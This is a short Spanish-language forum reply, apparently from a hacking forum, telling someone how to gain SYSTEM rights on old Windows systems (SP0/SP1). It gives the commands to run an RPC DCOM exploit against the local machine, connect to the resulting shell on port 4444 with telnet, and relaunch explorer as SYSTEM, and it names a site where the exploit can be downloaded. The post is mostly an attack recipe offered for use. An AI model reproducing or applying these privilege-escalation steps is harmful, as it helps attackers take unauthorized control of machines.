Supongo que te refieres a "admin" ya que "admin" y "system" tienen casi los mismos derechos, si eres "admin" no necesitas ser "system".
Para SP0 y SP1 tienes el exploit del RPC DCOM 1 y KHAT donde ejecutas desde tu consola
dcom 1 127.0.0.1
y luego ejecutas
telnet 127.0.0.1 4444
y ya tienes derechos de "system", si quieres abrir un escritorio como system solo ejecutas
tskill explorer&&explorer
.
Puedes bajarlo desde la pagina de descargas/exploits en
www.elhacker.net